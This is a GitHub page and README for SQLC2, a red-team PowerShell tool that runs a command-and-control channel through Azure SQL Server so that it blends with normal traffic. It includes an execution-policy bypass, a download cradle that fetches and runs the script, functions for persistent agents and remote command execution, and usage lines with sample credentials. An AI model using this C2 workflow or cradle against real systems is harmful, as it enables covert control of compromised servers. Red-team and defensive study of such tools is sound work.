Skip to content
SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent.
Branch: master
Clone or download
nullbind Add sqlc2cmds.cs
This will eventually become the core set of functions used by SQLC2 agents/servers during post exploitation.
Latest commit e0ae9d0 Aug 5, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
csharp Add sqlc2cmds.cs Aug 5, 2018
images Add files via upload May 25, 2018
tsql
LICENSE Update LICENSE May 25, 2018
README.md Update blog link. May 25, 2018
SQLC2.ps1

README.md

SQLC2

SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent. At its core, SQLC2 is just a PowerShell script, a TSQL script, and a few tables in an SQL Server instance that tracks agents, commands, and results. Nothing too fancy, but it may prove to be useful on some engagements. 

For a more complete overview of SQLC2 check out the blog at https://blog.netspi.com/databases-and-clouds-sql-server-as-a-c2/.

Author and License

  • Author: Scott Sutherland (@_nullbind), NetSPI - 2018
  • License: BSD 3-Clause
  • Required Dependencies: None

Why Bother with a SQL Server Based C2?

More companies are starting to use Azure SQL Server databases. When those Azure SQL Server instances are created, they are made accessible via a subdomain of database.windows.net on port 1433. For example, I could create SQL Server instance named "mysupersqlserver.database.windows.net". As a result, some corporate network configurations allow outbound internet access to any "database.windows.net" subdomain on port 1433.

The general idea is that as Azure SQL Server adoption grows, there will be more opportunity to use SQL Server as a control channel that looks kind of like normal traffic. SQLPS is a pretty basic proof of concept, but I think it’s functional enough to illustrate the idea. I know there are quite a few improvements to be made, but if you end up playing with it, I’d love your feedback.

Not Just for Azure

Although there is an emphasis on using SQLC2 with Azure SQL Server instances, you could host your own SQL Server in any cloud environment and have it listen on port 443 with SSL enabled. So, it could offer a little more flexibility depending on how much effort you want to put into it.

Loading SQLC2

  • Option 1: Download the script and import it. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies, so you may want to use the bypass option.

    Set-ExecutionPolicy Bypass -Scope Process

    Import-Module SQLC2.ps1

  • Option 2: Load it into a session via a download cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by executions policies.

    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/SQLC2/master/SQLC2.ps1")

    Note: To run as an alternative domain user, use the runas command to launch PowerShell first.

    runas /noprofile /netonly /user:domain\user PowerShell.exe

Basic SQLC2 architecture diagram

SQLC2Arch

User Functions

Below is a list of user functions that support the intended workflows.

Function Name Description
Install-SQLC2Server Install SQLC2 tables on target SQL Server/database.
Install-SQLC2AgentPs Install an agent that uses an SQL Server agent job and server link.
Install-SQLC2AgentLink Install an agent that uses a schedule task or registry key to execute PowerShell commands.
Set-SQLC2Command Set operating system commands for agents to run.
Get-SQLC2Command Get a list of pending operating system commands from the C2 for the agent. This can also execute the pending command with the -Execute flag.
Get-SQLC2Agent Get a list of agents registered on the SQLC2 server.
Get-SQLC2Result Get a list of pending and completed commands. Support servername, status, and cid filters.
Remove-SQLC2Agent Remove agents registered on the SQLC2. Simply clears the history.
Remove-SQLC2Command Remove the command history on the SQLC2 server.
Uninstall-SQLC2AgentLink Uninstall SQLC2 agent that uses server links and an agent job.
Uninstall-SQLC2AgentPs Uninstall all operating system based persistence methods.
Uninstall-SQLC2Server Remove the SQLC2 tables from the target database.

Screen Shots

Below are a few sample screenshots.

Install SQLC2 Server (Create tables):

Install-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Install C2

Install SQLC2 Agent (SQL Server agent Job that uses a server link):

Install-SQLC2AgentPs -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Install Agent

View SQLC2 Agents:

Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

SQLC2Arch

Set Command to Run on Agent:

Set-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!' -Command "Whoami" -ServerName MSSQLSRV04

Set_Command

Get Command Results:

Get-SQLC2Result -Verbose -ServerName "MSSQLSRV04" -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Get Command Output

You can’t perform that action at this time.